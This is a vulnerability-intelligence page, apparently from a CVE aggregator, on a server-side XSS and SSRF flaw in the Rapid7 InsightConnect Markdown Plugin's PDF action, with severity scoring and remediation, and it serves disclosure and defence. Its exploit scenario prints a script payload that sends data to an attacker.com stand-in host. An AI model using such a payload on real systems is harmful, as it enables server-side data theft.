Severity by source
AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
Network-reachable PDF rendering action; high complexity from non-trivial payload requirements; no privileges or user interaction needed; limited to confidentiality and integrity impacts.
Primary rating from Vendor (rapid7).
CVSS VectorVendor: rapid7
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
Lifecycle Timeline
3DescriptionCVE.org
Server-Side Cross-Site Scripting and Server-Side Request Forgery vulnerability in the markdown_to_pdf action of Rapid7 InsightConnect Markdown Plugin version 3.1.4 and earlier on Linux allows remote attackers to execute JavaScript server-side and make arbitrary outbound HTTP requests via crafted content embedded in Markdown input. The PDF rendering engine does not restrict script execution or outbound network access.
AnalysisAI
Server-side JavaScript execution and outbound HTTP request capabilities in Rapid7 InsightConnect Markdown Plugin versions 3.1.4 and earlier allow remote attackers to execute arbitrary scripts and make unauthorized HTTP requests through malicious content embedded in Markdown input to the markdown_to_pdf action. The PDF rendering engine lacks sufficient restrictions on script execution and network access. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The markdown_to_pdf action must be invoked with attacker-controlled or untrusted markdown content. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The moderate CVSS score (4.8) reflects network accessibility (AV:N) but high attack complexity (AC:H), indicating non-trivial exploitation conditions-likely requiring specific markdown syntax or rendering quirks to trigger. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with network access to an InsightConnect workflow submits a markdown document containing embedded JavaScript (e.g., `<script>fetch('http://attacker.com/steal?data=')</script>` or CSS resource references to external servers). When the markdown_to_pdf action processes the input, the PDF rendering engine executes the script in the server context, exfiltrating data via HTTP callbacks or making requests to attacker-controlled infrastructure. … |
| Remediation | Upgrade Rapid7 InsightConnect Markdown Plugin to version 4.0.0 or later. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39616
GHSA-6r62-qf74-xpgg